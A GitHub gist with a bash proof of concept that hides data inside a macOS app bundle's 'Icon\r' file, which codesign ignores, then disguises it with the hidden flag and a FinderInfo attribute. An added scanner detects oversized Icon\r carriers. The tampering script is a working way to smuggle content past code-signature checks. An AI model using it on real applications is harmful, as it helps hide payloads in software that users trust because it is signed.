@libcrack
Created August 18, 2016 05:16
Hide data inside OSX app signatures
#!/usr/bin/env bash
# root@libcrack.so
# Thu Aug 18 07:10:58 CEST 2016
#
# The file "Icon\r" (the name ends in a carriage return) is supposed to hold
# a user-provided custom icon for the app. Because "Icon\r" is completely
# ignored by codesign (and therefore by spctl), any amount of data can be
# hidden in it without invalidating the bundle's signature.
#
# A genuine "Icon\r" is hidden and inaccessible from the Finder by default.
# The same behaviour is reproduced here by setting the hidden flag and writing
# the FinderInfo extended attribute Finder puts on such files ("iconMACS@..."):
# 69636F6E4D414353401000000000000000000000000000000000000000000000
#
# https://gist.github.com/pwnsdx/584ccf0a9a2d36e5e77efdb55d66e8ed/raw/6d98c58fdffca56b20397f3a8f512280d67f964e/poc.sh
# https://medium.com/@sabrihaddouche/how-a-malware-can-infects-digitally-signed-files-without-altering-hashes-on-macos-c7dc9e391a8e#.rji8bg8i8
#
VAL="69636F6E4D414353401000000000000000000000000000000000000000000000"
ICON="Icon$(printf "\r")"

# Target bundle: first argument, falling back to the app used while writing this.
APP="Dropbox Modified.app"
APPDIR="${1:-/Users/$USER/Desktop/$APP}"

if [ -z "$APPDIR" ]; then
  printf "\e[0;31m[x]\e[0m Usage: %s <app dir>\n" "$0"
  exit 1
fi
if [ ! -d "$APPDIR" ]; then
  printf "\e[0;31m[x]\e[0m No such dir: \"%s\"\n" "$APPDIR"
  exit 2
fi

# Append 50 MiB of random bytes (base64-encoded) to Icon\r, then make the
# carrier look like a normal custom-icon file: hidden flag + FinderInfo xattr.
# The exit status reflects the outcome instead of the status of the last printf.
if cd "$APPDIR" && \
   openssl rand -base64 52428800 >> "$ICON" && \
   chflags hidden "$ICON" && \
   xattr -wx com.apple.FinderInfo "$VAL" "$ICON"; then
  printf "\e[0;32m[+]\e[0m Tampered \"%s\"\n" "$APPDIR"
  exit 0
else
  printf "\e[0;31m[x]\e[0m Failed to tamper \"%s\"\n" "$APPDIR"
  exit 3
fi
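The script above shows the hiding side only. The check a defender wants is the inverse: an Icon\r file is a legitimate, tiny resource, so any Icon\r inside a bundle that is megabytes in size is worth a look. The scanner below is an added example and is not part of libcrack's gist; it uses only find, wc and dd so it runs on macOS and Linux, and the fake bundles it builds (Clean.app, Tampered.app, the 1 MiB threshold) are constructed sample data, not real applications.

```shell
#!/usr/bin/env bash
# Added example, not part of libcrack's gist: scan a directory tree for
# "Icon\r" files that are far larger than any real custom-icon resource and
# therefore may be carrying hidden data. Only find/wc/dd are used, so it runs
# on macOS and Linux; the macOS-only follow-up checks are given in the text.

CR=$(printf '\r')
ICON_NAME="Icon$CR"

# Print every Icon\r file below $1 that is larger than $2 bytes (default
# 1 MiB), one per line, with the trailing carriage return shown as "\r".
find_icon_carriers() {
    root="$1"
    threshold="${2:-1048576}"
    # -name compares the literal basename, carriage return included;
    # -size +Nc means "more than N bytes" on both GNU and BSD find.
    find "$root" -type f -name "$ICON_NAME" -size "+${threshold}c" |
    while IFS= read -r f; do
        size=$(wc -c < "$f" | tr -d ' ')
        printf '%s\\r\t%s bytes\n' "${f%"$CR"}" "$size"
    done
}

# Number of suspicious Icon\r files below $1 (threshold $2, default 1 MiB).
count_icon_carriers() {
    find "$1" -type f -name "$ICON_NAME" -size "+${2:-1048576}c" | wc -l | tr -d ' '
}

# Constructed sample data: two fake bundles under $1. Clean.app carries a
# tiny, plausible Icon\r; Tampered.app carries a 2 MiB Icon\r like the one
# the gist appends to. Neither is a real application.
build_demo_bundles() {
    mkdir -p "$1/Clean.app/Contents" "$1/Tampered.app/Contents"
    printf 'icon' > "$1/Clean.app/$ICON_NAME"
    dd if=/dev/zero of="$1/Tampered.app/$ICON_NAME" bs=1048576 count=2 2>/dev/null
}

# Stand-alone demonstration: ./scan_icon_carriers.sh --demo
if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp -d)
    build_demo_bundles "$tmp"
    echo "Suspicious Icon\\r carriers under $tmp:"
    find_icon_carriers "$tmp" 1048576
    rm -rf "$tmp"
fi
```

Run it with `--demo` to see only Tampered.app reported; on a real system point find_icon_carriers at /Applications. For each hit on macOS, `codesign --verify --deep --strict --verbose=2 "X.app"` is the confirmation of the blind spot the gist relies on (the bundle still verifies), `ls -lO "X.app"` shows the hidden flag, and `xattr -px com.apple.FinderInfo "X.app/Icon$(printf '\r')"` shows whether the FinderInfo value above was written. Size is the only signal this scanner uses, so a carrier padded to a plausible icon size will not be caught; the threshold is a tunable, not a proof of cleanliness.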